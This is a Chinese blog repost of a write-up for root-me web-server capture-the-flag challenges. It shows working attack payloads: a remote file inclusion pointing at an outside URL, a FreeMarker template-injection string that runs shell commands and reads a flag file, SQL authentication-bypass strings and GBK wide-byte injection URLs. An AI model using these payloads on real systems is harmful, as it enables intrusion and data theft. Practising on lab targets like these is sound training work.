root-me web server 20-30 writeup

最新推荐文章于 2020-01-05 21:18:50 发布
最新推荐文章于 2020-01-05 21:18:50 发布
阅读量665 收藏
点赞数
文章标签: php java
原文链接:http://www.cnblogs.com/joy-nick/p/5569494.html
版权

Remote File Inclusion-远程文件包含

Get the PHP source code.

ctrl+u

进行RFI攻击需要同时具备三个条件(被攻击机器):

allow_url_fopen = On (默认开启)

allow_url_include = On (默认关闭)

被包含的变量前没有目录的限制

<?php
$filename = $_GET['file']; //将参数file的值传送给变量filename
include($filename); //使用include()函数包含变量
?>

view-source:http://challenge01.root-me.org/web-serveur/ch13/?lang=http://7xspti.com2.z0.glb.clouddn.com/123

Server-side Template Injection-服务器端模板注入

Java EE

Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.

参考资料

对输入过滤不严格

${2*3}

说明执行了

参考资料

<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("ls -l") }

找目录SECRET_FLAG.txt

查看选中部分源码

<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("cat ../SECRET_FLAG.txt") }

SQL injection - authentication

Retrieve the administrator password

ctrl+u

使用万能密钥

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

密码123456

ctrl+u

type="password" value="t0_W34k!$"

SQL injection - authentication - GBK

宽字节注入

参考资料

http://challenge01.root-me.org/web-serveur/ch42/index.php?id=1%bf%5c%27

http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%bf%5c'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),2,3,4,5,6,7,8)%23
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1%af%5c'Union(select(1),version(),3,4,5,6,7,8)%23

SQL injection - string-字符型注入

Retrieve the administrator password

http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1
正常
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1'
报错

?’ OR 1=1 /*

SELECT * FROM test WHERE name = '?’ OR 1=1 /*’ LIMIT 1

欢迎访问我的独立博客:joy_nick

转载于:https://www.cnblogs.com/joy-nick/p/5569494.html

weixin_34216036
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
root-me web server 10-20 writeup
weixin_33701294的博客
06-08 757
File upload - double extensions文件上传——双扩展 Gallery v0.02 介绍 Your goal is to hack this photo galery by uploading PHP code. /challenge/web-serveur/ch20/tmp/phpSfAkKz 访问无果 返回 查看源码 view-source:http://challe...
root-me web-client过关斩将
weixin_34378767的博客
05-11 1205
Root-me-web-client过关斩将第1题,Javascript - AuthenticationF12查看js的源代码,发现用户名和密码第2题,Javascript - SourceF12查看js的源代码,在判断语句中看到pass第3题,Javascript - Authentication 2F12查看js的源代码,在一个数组中看到pass第4题,Javascript - Obfusc...
Root Me Challenges_web-serveur_ 1_FileManager v 0.01(php://filter的运用)
silence1_的博客
05-06 473
Root Me Challenges___FileManager v 0.01 题目: 题目为FileManager v 0.01,提示信息:Retrieve the administrator password of this application.,就是要我们得到管理员密码 进入题目,有两个连接:home和login 点击进入,可以看到其实只是传了参数进去,分别为 ?inc=login.p...
RootMe--Install files
weixin_33893473的博客
04-03 390
题目链接:https://www.root-me.org/en/Challenges/Web-Server/Install-files 题目提示: 1. 你知道phpbb吗? 2. install file 打开题目发现什么东西也没有,F12发现有注释 <!-- /web-serveur/ch6/phpbb --> 给了提示后面可以加phpbb ...
[Root-me]Insecure Code Management Writeup
Vicl1fe的博客
12-29 5821
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 Root-me网址: https://www.root-me.org/en/Challenges/Web-Server/Insecure-Code-Management 知识点 git文件泄露 。。。 既然是git文件泄露,就需要泄露的工具了:https://github.com/internetwache/...
Rootme-WriteUp:来自tryhackme的RootME文章
04-13
RootME-tryhackme通过0xRar扫描nmap -T4 -A -p- MACHINE_IPNmap scan report for MACHINE_IPHost is up (0.15s latency).Not shown: 65464 closed ports, 69 filtered portsPORT STATE SERVICE VERSION22/tcp open ...
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
upload-labs-writeup-master.zip
10-25
总的来说,"upload-labs-writeup-master.zip"为学习和研究Web应用上传漏洞提供了全面的资源,对于提升网络安全意识和技能非常有价值。无论是初学者还是经验丰富的专业人士,都可以从中受益,加深对上传漏洞的理解,...
sql injection sql注入
weixin_34375251的博客
01-15 76
2019独角兽企业重金招聘Python工程师标准>>> ...
sql注入——宽字节注入
qq_33441500的博客
10-15 264
sql注入——宽字节注入 一,宽字节的由来 一个字符其大小为一个字节那么我们称其为窄字节 那么大小为两个字节的我们称其为宽字节 所有的英文默认占一个字节 那么中文汉字默认占两个字节 例如 gb2312,GBK,GB18030,BIG5,Shift_JIS这些编码都是宽字节 英文a-zA-Z共四十八种 一个字节都是八位的二进制 那么数字的0,1组合起来就有255...
SQL Injection的猥琐技巧
tonghua6的专栏
03-21 495
转载自:http://lightless.me/archives/SQL-Injection-weisuo-Skill.html ' or 1=1# '=0# '>-1# '1# 1'99# '=0=1# '0# '=0=1=1=1=1=1# '=11# '1# 1'99999# '!=2!=3!=4# '|0# '&0# '^0# '0# '>
sql injection
fisea的专栏
03-25 410
1、知道用户名但是不知道密码password:  or 1=1 --2、利用地址栏进行攻击知道数据库中的id字段?id=3;delete from tbname(会删除数据库里面的所有用户)采取措施:假设知道id是int的可以这样写:int id=0;if(int.TryParse(Request.QueryString["id"],out id)){var strSql="select *
WebGoat——SQL injection
OOM
08-09 4375
1、Stage 1 Stage 1: Use String SQL Injection to bypass authentication. Use SQL injection to log in as the boss ('Neville') without using the correct password. Verify that Neville's profile can be view
CTF - RootMe解题报告(持续更新中)
ζёСяêτ - 小優YoU
01-05 8373
完整原文(实时更新):http://exp-blog.com/2019/01/02/pid-2597/ (转载请注明出处,仅供分享学习,严禁用于商业用途) 官网入口:Root-Me(https://www.root-me.org) 注:  在解题过程,官方按不同的挑战主题提供了一些工具包,建议按需善用。这里也推荐一些挑战过程中会经常用到的工具:  ① Burp Suite:攻城利器,谁用谁...
CTF-rootme 题解之HTTP - Open redirect
weixin_30952535的博客
03-20 655
LINK:https://www.root-me.org/en/Challenges/Web-Server/HTTP-Open-redirect    http:challenge01.root-me.org/web-serveur/ch52/ Reference:https://github.com/zayzayzayzay/root-me-4/tree/master/Web-Serve...
CTF-rootme 题解之PHP filters
weixin_30384031的博客
03-20 510
LINK:https://www.root-me.org/en/Challenges/Web-Server/PHP-filters    https://challenge01.root-me.org/web-serveur/ch12/ Referrence:https://www.leavesongs.com/PENETRATION/php-filter-magic.html    ...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值